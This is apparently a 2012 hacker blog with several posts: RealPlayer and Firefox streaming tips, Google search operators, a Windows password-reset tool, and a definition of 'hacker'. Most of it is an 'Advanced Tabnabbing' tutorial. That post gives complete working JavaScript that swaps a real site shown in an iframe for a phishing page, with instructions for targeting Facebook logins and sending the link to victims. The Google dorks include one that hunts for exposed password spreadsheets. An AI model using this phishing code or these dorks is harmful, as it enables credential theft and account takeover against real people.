Thursday 26 April 2012

Real Player offline istallation |Hack the Hackers

Where can you download the latest official Real Player SP standalone offline installer so that you don’t have to download the full setup files over and over for installing more than one computer / laptop?

Face it, there are many home users who are living painfully with monthly bandwidth quota imposed by broadband Internet service provider. So, it is crucial for them to be able download standalone setup file for offline installation.

Trick to download the latest RealPlayer SP standalone offline installer

Direct download the latest official Real Player SP full setup installer.

This is not a hidden, hard-to-find trick but I bet there are people overlook the feature. Let’s see how these steps could help you to download the latest RealPlayer SP 12.0.0.756 full setup file (about 20MB):

1) Go to Real.com and proceed to download that “tiny” RealPlayerSPGold.exe (about 800KB; seems to be a customized download manager).

2) Double click that tiny installer and follow its instructions to proceed as usual.

3) When that tiny setup file starts to download latest installation files, click Cancel button to trigger alternative download option:

The official alternate download of the latest RealPlayer SP 12 standalone offline installer.

After click the “Alternate Installer” button, a dialog box (as shown in the first screenshot) appears to allow user download the 20MB standalone setup file that is good for offline installation.

Firefox Configuration to play live strems with VLC or RealPlayer

Hey Buddies,
                    Today i am gonna explain a very new trick for those who want to view live videos on 2g network , in india most of internet users are using on mobile phones and searching videos daily but the main problem is long time buffering, so to avoid buffering and wathing video as a live stream you have to know about the rtsp(Real Time Streaming) protocol, rtsp is use to stream real time videos on INTERNET like surveillance cams, live TV etc., we can use this protocol on mobile when we watch videos on m.youtube.com, but in pc we have to configure our browser to setup this protocol for viewing unlimited uninterrupted live streams via youtube or any live TV streams. process as follows-
Firefox
1.Configuring Firefox for Streaming Media (Real Player/VLC)

You must install RealPlayer/VLC to open urls with the RTSP protocol (rtsp://) .
Streaming media often uses the RTSP protocol (as evidenced by the link itself, rtsp://address). Firefox does not know how to handle this protocol natively. This can result in the error RTSP is not a registered protocol when you try to access streaming media on the web.
There are several ways to correct the error. We recommend adjusting the Firefox configuration settings by adding an entry for the RTSP protocol:
Open Firefox, and type about:config in the URL bar.
Right click in the main window and select New and then Boolean.
Enter network.protocol-handler.expose.rtsp for the preference name and click OK.
Select false and click OK.
Now Click On the video link and browser says to choose a program to open the link, select real player or vlc player.
Firefox should now be able to correctly associate streaming media with RealPlayer/VLC. To test this, please Open m.youtube.com and click watch video.
Thanks 

Tuesday 24 April 2012

GOOGLE HACKING – BEST SEARCHING GUIDE|Hack the Hackers

An Introduction:

HI, Friends I am back with my new tutorial GOOGLE HACKING. Google (http://www.google.com) can give lots of information to a hacker, to download files etc. The reason is because Google has lots of options on its search engine.
 We know the Google is the best search engine on the Internet. Millions of people searching on Google now. Now, we are faces many problems and time in searching our application or files on internet due to Increasing of webpages, files, and many applications. That’s why hackers exploit much vulnerability. Now I will explain you Google hacking, How to find a specific file or application on internet through Google.

Google search tricks ---

  FileType: We can search for specific files ex. *.xls, *.doc, *.pdf, *.ps, *.ppt, *.rtf, *.db, *.mdb, *.cfg, *.pwd, *.dat, etc.   

 EXAMPLE -- Filetype:xls  "pass"

  Inurl: We can specify a word, and it will return us all urls which contains the word    -    example --  inurl:admin

" Index of " : We can find directory listings of specific folders on servers    example---"index of" admin   or   index.of.admin

  Site: We can find specific sites (domain names) ex. *.com, *.org, *.mi, *.gov, etc.    -     example--- site:gov    or   site:gov "Soprano"

  Intitle: We can find specific urls with a specific title    example---intitle:securityillusions

  Link:  Allows us to check which site links to a specific site    example---link:securityillusions

These are all extreme search engine optimizer commands. So, enjoy fast searching… J

How to reset windows 7 admin password|Hack the Hackers

Anmosoft Windows Password Reset  is designed to recover windows 7 admin password, and other user passwords. With this Windows password recovery tool, you can instantly regain access to your locked computer by burning a bootable CD/DVD or USB flash drive on your own, when you forgot administrator password or domain password on Windows 7/Vista/XP/NT and Windows Server 2008(R2)/2003(R2)/2000.

To get your windows 7 password reset instantly and safely, you can firstly download Anmosoft Windows Password Reset and install it in a computer you have access to. And then insert a USB flash drive to the computer, and burning an ISO image to the USB. And you can set your locked computer to boot from CD ROM or USB. The windows 7 password recovery has been successfully achieved and now you can access your computer without password.

Monday 23 April 2012

Introduction to Hacking| Hack the Hackers

What is a Hacker?


So, what is a hacker? Let's try the Oxford English Dictionary's definition to find out.


hacker /"hak@/ n. me. [f. hack v.1 + -er1.]
1 A person who or thing which hacks (something). me.
2 spec. An enthusiastic computer programmer or user; a person who tries to gain unauthorized access to a computer or to data held in one. colloq.
hackerdom n. the realm or world of computer hackers

The OED Definition of "hacker" is not really very helpful, is it? The relevant part of the OED definition is split between two different types of hacker.




  • An enthusiastic computer programmer or user.
    This is the original meaning of the word hacker. A hacker is someone who enjoys learning and exploring computer and network systems, and consequently gains a deep understanding of the subject. Such people often go on to become systems programmers or administrators, web site administrators, or system security consultants. Hackers such as these, because they spend more time pointing out and securing against system security holes, are sometimes referred to as white-hat hackers.
  • A person who tries to gain unauthorized access to a computer or to data held on one.
    This is the most conventionally understood meaning of the word hackers as propagated in Hollywood films and tabloid newspapers. A lot of people who are quite happy to call themselves hackers by the first definition regard the second group with derision, calling them "crackers", as they specialize in "cracking" system security. Such crackers, who spend all their time finding and exploiting system security holes, are often known as black-hat hackers.
    The reality is full of grey areas. As a white-hat hacker I have legally broken into systems to further my understanding of system security, but I did not specialize in cracking systems security in general. Many of the black-hat hackers I have known are computer enthusiasts who just happen to be most enthusiastic about breaking into systems, and whose knowledge of computers and networking protocols is second to none. At the end of the day, which type of hacker you are depends on your ethics, and whether you are breaking the law or not .
  • Advanced Tabnabbing Tutorial | Hack the Hackers

    Hey friends, today i am going to How to Hack emails, social networking websites and other websites involving login information. The technique that i am going to teach you today is Advanced Tabnabbing. I have already explained what is basic tabnabbing today we will extend our knowledge base, i will explain things with practical example. So lets learn..
    I will explain this tutorial  using attack scenario and live example and how to protect yourself from such stuff.
     Let consider a attack scenario:
     1. A hacker say(me Imran) customizes current webpage by editing/adding some new parameters and variables.( check the code below for details)
     2. I (Imran) sends a copy of this web page to victim whose account or whatever i want to hack.
     3. Now when user opens that link, a webpage similar to this one will open in iframe containing the real page with the help of java script.
     4. The user will be able to browse the website like the original one, like forward backward and can navigate through pages.
     5. Now if victim left the new webpage open for certain period of time, the tab or website will change to Phish Page or simply called fake page which will look absolutely similarly to original one.
     6. Now when user enter his/her credentials (username/password), he is entering that in Fake page and got trapped in our net that i have laid down to hack him.
     Here end's the attack scenario for advanced tabnabbing.

     Note: This tutorial is only for Educational Purposes, I did not take any responsibility of any misuse, you will be solely responsible for any misuse that you do.  Hacking email accounts is criminal activity and is punishable under cyber crime and you may get upto 10 years of imprisonment, if got caught in doing so.

     Before coding Part lets first share tips to protect yourself from this kind of attack because its completely undetectable and you will never be able to know that your account is got hacked or got compromised. So first learn how to protect our-self from Advanced Tabnabbing.

     Follow below measure to protect yourself from Tabnabbing:
     1. Always use anti-java script plugin's in your web browser that stops execution of malicious javascripts. For example: Noscript for Firefox etc.
     2. If you notice any suspicious things happening, then first of all verify the URL in the address bar.
     3. If you receive any link in the Email or chat message, never directly click on it. Always prefer to type it manually in address bar to open it, this may cost you some manual work or time but it will protect you from hidden malicious URL's.
     4. Best way is to use any good web security toolbar like AVG web toolbar or Norton web security toolbar to protect yourself from such attacks.
     5. If you use ideveloper or Firebug, then verify the headers by yourself if you find something suspicious.

     That ends our security Part. Here ends my ethical hacker duty to notify all users about the attack. Now lets start the real stuff..

     Note: Aza Raskin was the first person to propose the technique of tabnabbing and still we follow the same concept. I will just extend his concept to next level.




     First sample code for doing tabnabbing with the help of iframes:
    <!--
     Title: Advanced Tabnabbing using IFRAMES and Java script
     Author: De$trUcTiVe M!ND (taibamanasa@gmail.com)
    Website: http://www.tanwarimran.blogspot.in
     Version:1.6
     -->

     <html>
     <head><title></title></head>
     <style type="text/css">
     html {overflow: auto;}
     html, body, div, iframe {margin: 0px; padding: 0px; height: 100%; border: none;}
     iframe {display: block; width: 100%; border: none; overflow-y: auto; overflow-x: hidden;}
     </style>
     <body>

     <script type="text/javascript">
     //----------Set Script Options--------------
     var REAL_PAGE_URL = "http://www.google.com/"; //This is the "Real" page that is shown when the user first views this page
     var REAL_PAGE_TITLE = "Google"; //This sets the title of the "Real Page"
     var FAKE_PAGE_URL = "http://www.tanwarimran.blogspot.in"; //Set this to the url of the fake page
     var FAKE_PAGE_TITLE = "Hack the Hackers"Next Generation Hackers Portal"; //This sets the title of the fake page
     var REAL_FAVICON = "http://www.google.com/favicon.ico"; //This sets the favicon.  It will not switch or clear the "Real" favicon in IE.
     var FAKE_FAVICON = "http://www.tanwarimran.blogspot.in/favicon.ico"; //Set's the fake favicon.
     var TIME_TO_SWITCH_IE = "4000"; //Time before switch in Internet Explorer (after tab changes to fake tab).
     var TIME_TO_SWITCH_OTHERS = "10000"; //Wait this long before switching .
     //---------------End Options-----------------
     var TIMER = null;
     var SWITCHED = "false";

     //Find Browser Type
     var BROWSER_TYPE = "";
     if(/MSIE (\d\.\d+);/.test(navigator.userAgent)){
      BROWSER_TYPE = "Internet Explorer";
     }
     //Set REAL_PAGE_TITLE
     document.title=REAL_PAGE_TITLE;

     //Set FAVICON
     if(REAL_FAVICON){
      var link = document.createElement('link');
      link.type = 'image/x-icon';
      link.rel = 'shortcut icon';
      link.href = REAL_FAVICON;
      document.getElementsByTagName('head')[0].appendChild(link);
     }

     //Create our iframe (tabnab)
     var el_tabnab = document.createElement("iframe");
     el_tabnab.id="tabnab";
     el_tabnab.name="tabnab";
     document.body.appendChild(el_tabnab);
     el_tabnab.setAttribute('src', REAL_PAGE_URL);

     //Focus on the iframe (just in case the user doesn't click on it)
     el_tabnab.focus();

     //Wait to nab the tab!
     if(BROWSER_TYPE=="Internet Explorer"){ //To unblur the tab changes in Internet Web browser
      el_tabnab.onblur = function(){
      TIMER = setTimeout(TabNabIt, TIME_TO_SWITCH_IE);
      }
      el_tabnab.onfocus= function(){
      if(TIMER) clearTimeout(TIMER);
      }
     } else {
      setTimeout(TabNabIt, TIME_TO_SWITCH_OTHERS);
     }

     function TabNabIt(){
      if(SWITCHED == "false"){
      //Redirect the iframe to FAKE_PAGE_URL
      el_tabnab.src=FAKE_PAGE_URL;
      //Change title to FAKE_PAGE_TITLE and favicon to FAKE_PAGE_FAVICON
      if(FAKE_PAGE_TITLE) document.title = FAKE_PAGE_TITLE;

      //Change the favicon -- This doesn't seem to work in IE
      if(BROWSER_TYPE != "Internet Explorer"){
      var links = document.getElementsByTagName("head")[0].getElementsByTagName("link");
      for (var i=0; i<links.length; i++) {
      var looplink = links[i];
      if (looplink.type=="image/x-icon" && looplink.rel=="shortcut icon") {
      document.getElementsByTagName("head")[0].removeChild(looplink);
      }
      }
      var link = document.createElement("link");
      link.type = "image/x-icon";
      link.rel = "shortcut icon";
      link.href = FAKE_FAVICON;
      document.getElementsByTagName("head")[0].appendChild(link);
      }
      }
     }
     </script>

     </body>
     </html>



    Now what you need to replace in this code to make it working say for Facebook:
     1. REAL_PAGE_URL : www.facebook.com
     2. REAL_PAGE_TITLE : Welcome to Facebook - Log In, Sign Up or Learn More
     3. FAKE_PAGE_URL : Your Fake Page or Phish Page URL
     4. FAKE_PAGE_TITLE : Welcome to Facebook - Log In, Sign Up or Learn More
     5. REAL_FAVICON : www.facebook.com/favicon.ico
     6. FAKE_FAVICON : Your Fake Page URL/favicon.ico ( Note: Its better to upload the facebook favicon, it will make it more undetectable)
     7. BROWSER_TYPE : Find which web browser normally user uses and put that name here in quotes.
     8. TIME_TO_SWITCH_IE : Put numeric value (time) after you want tab to switch.
     9. TIME_TO_SWITCH_OTHERS : Time after which you want to switch back to original 'real' page or some other Page.

     Now as i have explained earlier you can use this technique to hack anything like email accounts, Facebook or any other social networking website. What you need to do is that just edit the above mentioned 9 fields and save it as anyname.htm and upload it any free web hosting website along with favicon file and send the link to user in form of email or chat message ( hidden using href keyword in html or spoofed using some other technique).

     That's all for today. I hope you all enjoyed some advanced stuff. If you have any doubts or queries ask me in form of comments.
     A comment of appreciation will do the work..